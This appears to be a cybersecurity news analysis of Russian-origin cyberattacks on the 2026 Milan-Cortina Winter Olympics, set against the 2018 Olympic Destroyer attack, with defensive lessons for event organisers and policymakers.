Italy Claims Russian-Origin Cyberattacks Targeting Winter Olympics: State-Sponsored Disruption Campaign

Breached Company

Breached Company

14 min read
Italy Claims Russian-Origin Cyberattacks Targeting Winter Olympics: State-Sponsored Disruption Campaign

Just hours before the opening ceremony of the 2026 Winter Olympics in Milan and Cortina d'Ampezzo, Italy's Foreign Minister Antonio Tajani confirmed what cybersecurity experts had long anticipated: Russia was once again targeting the Olympic Games with cyberattacks. The announcement marks the latest chapter in a disturbing pattern of state-sponsored cyber aggression against international sporting events, echoing the devastating Olympic Destroyer attack that nearly derailed the 2018 Winter Games in PyeongChang, South Korea.

"We prevented a series of cyberattacks against foreign ministry sites, starting with Washington, and also involving some Winter Olympics sites, including hotels in Cortina," Tajani told reporters on February 4, 2026. "These are actions of Russian origin."

The admission raises critical questions about the persistent vulnerability of major international events to nation-state cyber operations and the geopolitical motivations driving these attacks. As organizations prepare for increasingly sophisticated threat actors, the 2026 Winter Olympics cyberattack campaign provides crucial lessons about the intersection of international politics, cyber warfare, and event security.

The 2026 Attack: Scope and Attribution

According to Italian authorities, approximately 120 websites and digital systems were targeted in a coordinated campaign that hit multiple vectors simultaneously. The affected targets included:

  • Italian Foreign Ministry offices abroad, including the embassy in Washington, D.C., and consulates in Sydney, Toronto, and Paris
  • Olympic-related infrastructure, including hotels in Cortina d'Ampezzo where athletes were staying
  • Event management systems supporting the Games' digital operations

Despite the breadth of the attack, Italian officials reported that the intrusions were "effectively neutralized" before they could cause significant disruption. Unlike the 2018 PyeongChang attack, which disabled Wi-Fi networks, television broadcasts, security gates, and the official Olympics app during the opening ceremony, Italy's defensive posture appears to have prevented catastrophic operational failures.

The pro-Russian hacktivist group NoName057(16) claimed responsibility for the attacks on Telegram, describing the campaign as retaliation for Italy's support of Ukraine. "The Italian government's pro-Ukrainian policy means that support for Ukrainian terrorists is punished with our DDoS attacks," the group stated.

NoName057(16) emerged shortly after Russia's full-scale invasion of Ukraine in February 2022 and has focused primarily on distributed denial-of-service (DDoS) attacks against European nations supporting Kyiv, including Poland, Czechia, Lithuania, and Italy. The group operates by mobilizing hundreds of volunteers and maintaining a loose network of servers to conduct relatively simple but disruptive attacks.

However, the involvement of a hacktivist group claiming credit doesn't necessarily mean state-sponsored actors aren't involved. Russia has a well-documented history of using proxy groups and false flag operations to obfuscate attribution—a tactic that reached its apex during the 2018 PyeongChang Olympics attack.

The Geopolitical Context: Why Russia Targets the Olympics

To understand why Russia continues to target Olympic events, we must examine the complex relationship between the Kremlin, international sporting competitions, and national prestige.

Russia's Olympic Ban

Russia has been barred from competing as a nation in the 2026 Winter Games due to its ongoing war in Ukraine. The International Olympic Committee (IOC) imposed an indefinite ban on Russian athletes following the country's 2022 invasion. While 13 Russian athletes and 7 Belarusian athletes have been cleared to compete as neutrals—without national flags, anthems, or official recognition—the exclusion represents a significant blow to Russian national pride.

This is not the first time Russia has faced Olympic sanctions. The country was previously banned from the 2018 Winter Olympics after investigators uncovered a state-run doping program that violated anti-doping regulations on a massive scale. Russian athletes were allowed to compete under the designation "Olympic Athletes from Russia" (OAR), but could not represent their country officially.

For decades, Russia has leveraged sporting events, especially the Olympics, for political gain. From the 1950s onward, the Soviet Union viewed the Games as an opportunity to demonstrate the superiority of socialism over capitalism, with the USSR-US rivalry pervading most major sporting events for three decades. The 2014 Winter Olympics in Sochi, which Russia hosted with enormous fanfare and expense, was intended as a showcase of Russian power and organizational capability on the world stage.

When that prestige is threatened through bans and sanctions, Russia has repeatedly responded with cyber operations.

Historical Precedent: The Fancy Bear WADA Breach

Following the doping scandal that led to Russia's ban from the 2018 Olympics, the Kremlin-backed hacking group Fancy Bear (also known as APT28) breached the World Anti-Doping Agency (WADA) in 2016. The hackers stole and leaked athletes' medical data in an apparent attempt to undermine the credibility of regulators investigating the Russian doping program.

By exposing that other athletes had also received medical exemptions for otherwise-banned substances, the operation sought to create a narrative of hypocrisy—suggesting that Russia was being unfairly singled out while other nations' athletes received special treatment.

This pattern of retaliatory cyber operations against organizations that threaten Russian interests has become a hallmark of the Kremlin's approach to cyber conflict.

The PyeongChang Precedent: Olympic Destroyer's Devastating Impact

The 2018 Winter Olympics cyberattack remains one of the most sophisticated and deceptive hacking operations in history, serving as a crucial case study for understanding Russia's capabilities and tactics when targeting international sporting events.

The Attack Unfolds

On February 9, 2018, just minutes before the PyeongChang Winter Olympics opening ceremony began, a devastating cyberattack struck the Games' digital infrastructure. The malware, later dubbed Olympic Destroyer, systematically dismantled critical systems:

  • All nine domain controllers in the Seoul data centers were paralyzed, crippling the entire IT network
  • Wi-Fi networks throughout the stadium and 12 other Olympic facilities went offline
  • Thousands of internet-connected televisions displaying the ceremony went black
  • Every RFID-based security gate leading into Olympic buildings stopped functioning
  • The official Olympics app, including its digital ticketing system, ceased working
  • Automated ski gates and ski lifts at targeted resorts were temporarily disabled

Thousands of spectators found themselves unable to print tickets or access event information. For Sang-jin Oh, the director of technology for the PyeongChang Olympics organizing committee who had overseen the setup of more than 10,000 PCs, 20,000 mobile devices, 6,300 Wi-Fi routers, and 300 servers, the attack represented a nightmare scenario unfolding in real-time.

As fireworks exploded around the stadium and the opening ceremony proceeded, Oh and his team worked frantically to restore systems. They ultimately made the desperate decision to cut off the entire Olympic network from the internet to isolate the attackers and prevent further damage.

It took 12 hours of around-the-clock work to rebuild the Olympics' digital infrastructure from backups and restore normal operations. Amazingly, the next day's skating and ski jumping events proceeded with only minor hiccups, and most athletes and spectators remained unaware of how close the Games had come to technological catastrophe.

The False Flag Masterpiece

What made Olympic Destroyer truly unprecedented wasn't just its disruptive impact—it was the elaborate deception operation surrounding it.

The malware contained multiple layers of false flags designed to confuse forensic analysts:

  1. North Korean clues: The data-wiping component shared characteristics with malware used by the Lazarus hacking group, linked to North Korea. The code deleted files using the same distinctive technique—wiping just the first 4,096 bytes—that Lazarus had previously employed.
  2. Chinese fingerprints: Components of the password-stealing code matched exactly with tools used by APT3 and APT10, both groups reportedly linked to the Chinese government. Some of these code elements had never been seen in any other hacking operations.
  3. Russian similarities: The malware's overall structure resembled previous Russian cyberattacks like NotPetya and Bad Rabbit, using similar password-stealing tools and remote access techniques.
  4. Forged metadata: Perhaps most sophisticated, the malware's file header metadata was deliberately falsified to point toward North Korean authorship. Only through meticulous analysis by Kaspersky researcher Igor Soumenkov was this deception uncovered—he discovered that the header didn't match other clues in the code itself, proving it had been forged.

This level of deception represented "psychological warfare on reverse-engineers," according to Silas Cutler, a security researcher at CrowdStrike. The goal wasn't to point at a single false culprit but to create epistemological chaos, making analysts doubt every conclusion they reached.

Attribution Through Infrastructure

While the code-level deceptions were sophisticated, researchers eventually identified the true perpetrators through patient infrastructure analysis.

FireEye researcher Michael Matonis took a different approach, examining not the malware's code but the infrastructure used to deliver it. By tracing IP addresses, domain names, and command-and-control servers over weeks of investigation, he discovered connections to:

  • Previous attacks targeting Ukrainian LGBT activist groups and government agencies
  • The broader Russian cyber campaign against Ukraine that included power grid attacks
  • The 2016 breach of Arizona and Illinois state election boards
  • Domain spoofing operations that impersonated a Florida-based voting technology company

The trail led definitively to Russia's military intelligence agency, the GRU, and specifically to GRU Unit 74455 operating out of a building in Khimki, Moscow—the same unit behind the NotPetya attack that caused $10 billion in global damage and the broader election interference campaign against the United States.

The U.S. Justice Department's July 2018 indictment of 12 GRU hackers, including Unit 74455 member Anatoliy Sergeyevich Kovalev, provided official confirmation of what researchers had painstakingly uncovered.

The Sandworm Connection

Evidence strongly suggests that Olympic Destroyer was the work of Sandworm (also known as APT44), one of the most dangerous Russian hacking groups operating under GRU control.

Sandworm had previously conducted a relentless cyber campaign against Ukraine, including:

  • Two unprecedented attacks on Ukrainian power utilities in 2015 and 2016, causing blackouts for hundreds of thousands
  • The NotPetya worm in 2017, the most costly cyberattack in history
  • Repeated data-destroying intrusions against Ukrainian companies, government agencies, railways, and airports

The group's willingness to cause physical disruption and accept massive collateral damage—NotPetya spread far beyond Ukraine to cripple global shipping companies, pharmaceutical manufacturers, and countless other organizations—marked it as an exceptionally reckless actor willing to cross lines other nation-state groups avoided.

Italy's Defensive Posture: Lessons Learned

The relative success of Italy's defensive operations against the 2026 Olympics cyberattack campaign suggests that lessons from PyeongChang have been internalized.

Preparation and Planning

The PyeongChang organizing committee had conducted extensive preparation, including:

  • 20 cybersecurity advisory group meetings since 2015
  • Disaster simulation drills as early as summer 2017
  • Exercises covering cyberattacks, fires, and earthquakes

Despite this preparation, the actual attack still overwhelmed their systems. The difference in 2026 appears to be that Italian authorities anticipated the specific threat of Russian-origin attacks and established monitoring and response capabilities before the threat materialized.

Early Detection and Rapid Response

The fact that Italian officials publicly acknowledged and neutralized attacks targeting 120 sites suggests sophisticated monitoring capabilities detected the intrusions early in the attack cycle. Rather than allowing attackers to establish persistence and trigger destructive payloads during a critical moment (like the opening ceremony), defenders identified and contained the threat.

This represents a maturation of Olympic cybersecurity from reactive to proactive posture.

International Cooperation

Foreign Minister Tajani's statement specifically mentioned attacks on Italian diplomatic facilities abroad, including in Washington, D.C. This suggests coordination with U.S. and other allied cybersecurity agencies to share threat intelligence and indicators of compromise.

The Five Eyes intelligence alliance (U.S., UK, Canada, Australia, and New Zealand), NATO cybersecurity organizations, and European Union cyber defense initiatives likely played roles in detecting and attributing the attacks.

The Hacktivist Front: NoName057(16) and Russian Proxies

The claim of responsibility by NoName057(16) fits a pattern of Russian operations utilizing ostensibly independent hacktivist groups to provide plausible deniability while advancing state interests.

The Hacktivist Model

Pro-Russian hacktivist groups emerged prominently after the 2022 invasion of Ukraine, conducting DDoS attacks and low-level disruptions against nations supporting Kyiv. Groups like NoName057(16), Killnet, and Anonymous Russia operate in a grey zone—they may genuinely consist of nationalist volunteers, but they often advance objectives that align perfectly with Russian state interests.

This creates attribution ambiguity: Are these truly independent hacktivists, or are they coordinated (or at least tolerated) by Russian intelligence services as a form of cyber militia?

DDoS vs. Sophisticated Intrusions

NoName057(16)'s typical modus operandi involves distributed denial-of-service attacks—flooding targets with traffic to make websites and services unavailable. These attacks are relatively simple to execute and difficult to prevent entirely, though their impact is generally limited to temporary disruption.

The attacks described by Italian authorities, however, appear to have been more sophisticated, targeting diplomatic systems and Olympic infrastructure in coordinated fashion. This raises questions about whether NoName057(16) acted alone or whether more capable actors conducted operations under hacktivist cover.

The PyeongChang precedent suggests we should be skeptical of surface-level attribution claims and examine deeper infrastructure and capability indicators.

The Broader Pattern: Russia's Cyber Campaign Against International Sports

The 2026 Winter Olympics attack is not an isolated incident but part of a sustained pattern of Russian cyber aggression against international sporting events.

Paris 2024 Summer Olympics

During the 2024 Summer Olympics in Paris, French authorities and cybersecurity researchers reported increased cyber and disinformation activity originating from Russia. While these operations did not achieve the disruptive impact of PyeongChang, they demonstrated continued interest in undermining events where Russian participation was restricted.

Tokyo 2020 Olympics

In October 2020, British intelligence officials accused Russia of conducting cyberattacks targeting the Tokyo 2020 Olympics (held in 2021 due to COVID-19 delays). The UK's National Cyber Security Centre (NCSC) attributed the attacks to GRU Unit 74455—the same Sandworm group behind Olympic Destroyer.

The Pattern of Retaliation

Each of these attacks follows Russian exclusion or limitation from Olympic competition:

  • 2016: WADA breach follows doping investigation
  • 2018: Olympic Destroyer follows Russian ban from PyeongChang
  • 2020: Tokyo Olympics targeted after continued Russian restrictions
  • 2024: Paris Olympics face disinformation during ongoing Ukraine war
  • 2026: Milan-Cortina targeted as Russian ban continues

The pattern suggests that Olympic cyberattacks function as a form of asymmetric retaliation—Russia cannot compete openly, so it seeks to undermine the events themselves.

Strategic Implications for Cybersecurity Professionals

The 2026 Winter Olympics cyberattack campaign offers several critical lessons for security professionals defending high-profile events and critical infrastructure.

1. Anticipate Geopolitical Motivations

Major international events become targets not because of their technical vulnerabilities but because of their symbolic and political significance. Threat modeling must account for adversaries with nation-state capabilities and strong motivations to disrupt operations.

Organizations hosting or supporting high-profile events should conduct thorough geopolitical analysis to identify potential threat actors and their motivations. In this case, Russia's exclusion from the Olympics created a predictable incentive structure for cyber operations.

2. Defense in Depth for Event Infrastructure

The PyeongChang attack succeeded in part because disabling domain controllers created a cascading failure across the entire IT infrastructure. Modern event security architectures should include:

  • Segmentation: Isolate critical systems so compromise of one doesn't cascade
  • Redundancy: Maintain backup systems that can quickly assume primary roles
  • Offline backups: Ensure recovery capabilities exist even if network infrastructure is compromised
  • Manual fallbacks: Design processes that can function without digital systems during crisis response

3. Expect Deception and False Flags

Nation-state actors investing in high-profile operations will also invest in sophisticated attribution evasion. Security teams should:

  • Look beyond code-level indicators to infrastructure patterns
  • Analyze long-term campaigns rather than isolated incidents
  • Share intelligence with peer organizations and government agencies
  • Maintain healthy skepticism about initial attribution claims, even from reputable sources

4. Pre-Event Threat Hunting

Italy's success in neutralizing the 2026 attacks suggests they had established monitoring and threat hunting capabilities before the Games began. Organizations should:

  • Deploy enhanced monitoring weeks or months before high-risk events
  • Hunt proactively for indicators of compromise rather than waiting for alerts
  • Establish 24/7 security operations coverage during critical windows
  • Conduct tabletop exercises and simulations specific to anticipated threat scenarios

5. International Cooperation

Major events increasingly require cybersecurity cooperation across national boundaries. Italy's coordination with diplomatic facilities abroad and likely intelligence sharing with allies demonstrates the value of:

  • Bilateral and multilateral threat intelligence sharing agreements
  • Participation in sector-specific information sharing organizations
  • Relationships with national cybersecurity agencies (CISA, NCSC, ANSSI, etc.)
  • Coordination with hosting nation's law enforcement and intelligence services

The Future of Olympic Cybersecurity

As the Olympic movement continues, the cybersecurity challenges will only intensify.

The Attribution Problem Persists

Despite eventual attribution of the PyeongChang attack to Russia, the initial confusion created by Olympic Destroyer's false flags demonstrates the persistent challenge of timely, accurate attribution. As Jason Healey, a cyberconflict researcher at Columbia University, warns: "For the folks that can't afford CrowdStrike and FireEye, for the vast bulk of nations, attribution is still an issue."

This creates particular dangers for nations where misattributed cyberattacks could trigger disproportionate responses. "If you can't imagine this with US and Russia, imagine it with India and Pakistan, or China and Taiwan, where a false flag provokes a much stronger response than even its authors intended," Healey notes.

The Public Dimension

False flags don't need to fool cybersecurity professionals to achieve their objectives—they only need to create enough public confusion to undermine collective response. As FireEye's John Hultquist observed after Olympic Destroyer: "The question is one of audience. The problem is that the US government may never say a thing, and within 24 hours, the damage is done. The public was the audience in the first place."

In an era of rapid social media dissemination and declining trust in institutions, deception operations can shape public narratives even when technical evidence points clearly toward attribution.

Escalation Risks

Sandworm's track record suggests an escalating willingness to accept collateral damage and cross previously respected boundaries:

  • Ukrainian power grid attacks demonstrated willingness to target civilian infrastructure
  • NotPetya's global spread showed disregard for massive economic consequences
  • Olympic Destroyer revealed sophisticated deception capabilities

Future attacks may combine all these elements—destructive capability, global reach, and attribution evasion—in ways that create unprecedented challenges for defenders and policymakers.

Recommendations for Organizations

While most organizations will never defend Olympic-scale events, the lessons from Italy's 2026 experience apply broadly:

For Event Organizers

  1. Begin security planning years in advance, not months
  2. Conduct geopolitical threat analysis to identify motivated adversaries
  3. Establish relationships with national cybersecurity agencies early
  4. Build redundant systems that can operate independently if primary infrastructure fails
  5. Practice incident response through realistic simulations
  6. Plan for attribution ambiguity and establish communications strategies for attack scenarios

For Critical Infrastructure Operators

  1. Study nation-state TTPs from incidents like Olympic Destroyer
  2. Implement network segmentation to prevent cascading failures
  3. Maintain offline recovery capabilities that don't depend on network infrastructure
  4. Establish threat intelligence partnerships with peer organizations
  5. Conduct regular threat hunting for sophisticated, persistent threats
  6. Prepare for false flag operations that may complicate incident response

For Policymakers

  1. Establish norms and consequences for cyberattacks on international events
  2. Improve attribution capabilities and timelines for public disclosure
  3. Support international cybersecurity cooperation frameworks
  4. Invest in defensive capabilities for organizations hosting major events
  5. Counter disinformation rapidly when false flags create public confusion

Conclusion: The Permanent Cyber Shadow Over International Events

The 2026 Winter Olympics cyberattack represents both progress and persistent challenges in defending major international events against nation-state adversaries.

Italy's apparent success in neutralizing Russian-origin attacks before they could cause operational disruption demonstrates that lessons from PyeongChang have been learned and applied. Enhanced monitoring, international cooperation, and proactive threat hunting can significantly improve defensive posture against even sophisticated adversaries.

However, the attack's occurrence underscores a troubling reality: major international events will face cyber threats as long as they carry geopolitical significance. Russia's pattern of attacking Olympics from which it has been excluded suggests a predictable but difficult-to-prevent cycle of retaliation.

The evolution from Olympic Destroyer's devastating but ultimately contained impact in 2018 to Italy's early neutralization of attacks in 2026 provides reason for cautious optimism. Defenders are learning, adapting, and improving their capabilities.

But adversaries are learning too. Sandworm and other sophisticated nation-state actors continue to develop more advanced techniques, more elaborate deceptions, and potentially more destructive capabilities.

As Sang-jin Oh, the technology director who fought to save the PyeongChang Olympics, reflected: "It still makes me furious that, without any clear purpose, someone hacked this event. It would have been a huge black mark on these games of peace. I can only hope that the international community can figure out a way that this will never happen again."

That hope remains aspirational. Until international norms with real enforcement mechanisms constrain nation-state cyber operations against civilian targets, major events will operate under a permanent cyber shadow. The best defenders can do is prepare rigorously, cooperate extensively, and respond rapidly when attacks inevitably come.

The 2026 Winter Olympics will proceed. Athletes will compete, medals will be awarded, and the world will watch. Behind the scenes, however, another competition continues—one between nation-state attackers seeking to disrupt and embarrass their geopolitical rivals, and defenders working to ensure that international events remain free from cyber warfare's long reach.

For now, Italy's defenders have won this round. But the broader conflict is far from over.

Key Takeaways

  1. Russia attacked the 2026 Winter Olympics with cyberattacks targeting 120 sites, including diplomatic facilities and Olympic infrastructure
  2. Italian authorities successfully neutralized the attacks before they could cause significant disruption
  3. Historical precedent from PyeongChang 2018 shows Russia's Sandworm group capable of devastating Olympic attacks with sophisticated false flags
  4. Geopolitical motivations are clear: Russia targets Olympics from which it has been excluded or sanctioned
  5. Defense requires international cooperation, early preparation, and sophisticated threat hunting capabilities
  6. Attribution challenges persist despite improved capabilities, with false flags designed to create confusion
  7. Future attacks will likely escalate, combining destructive capability, deception, and global reach

Organizations defending high-profile events must learn from these incidents to build resilient architectures, establish intelligence partnerships, and prepare for adversaries with nation-state capabilities and strong motivations to disrupt operations.

The cyber shadow over international sporting events is permanent. The question is whether defenders can stay ahead of increasingly sophisticated and motivated attackers.

Sources:

  • Reuters: "Italy foiled Russia-linked cyberattacks on embassies, Olympic sites"
  • The Record: "Italy blames Russia-linked hackers for cyberattacks ahead of Winter Olympics"
  • The Register: "'Russian origin' cyberattacks target Italy's Winter Olympics"
  • WIRED: "Inside Olympic Destroyer, the Most Deceptive Hack in History"
  • Multiple cybersecurity firms (Cisco Talos, CrowdStrike, Kaspersky, FireEye)
  • U.S. Department of Justice indictments of GRU Unit 74455

Read more

Operation Leak: FBI and Global Partners Dismantle LeakBase, One of the World's Largest Cybercriminal Data Forums

Operation Leak: FBI and Global Partners Dismantle LeakBase, One of the World's Largest Cybercriminal Data Forums

March 4, 2025 — In one of the most sweeping international cybercrime enforcement actions of the year, the Federal Bureau of Investigation, Europol, and law enforcement agencies spanning 14 countries have dismantled LeakBase — a massive open-web forum where cybercriminals bought, sold, and traded stolen data from breaches targeting American corporations, individuals,

By Breached Company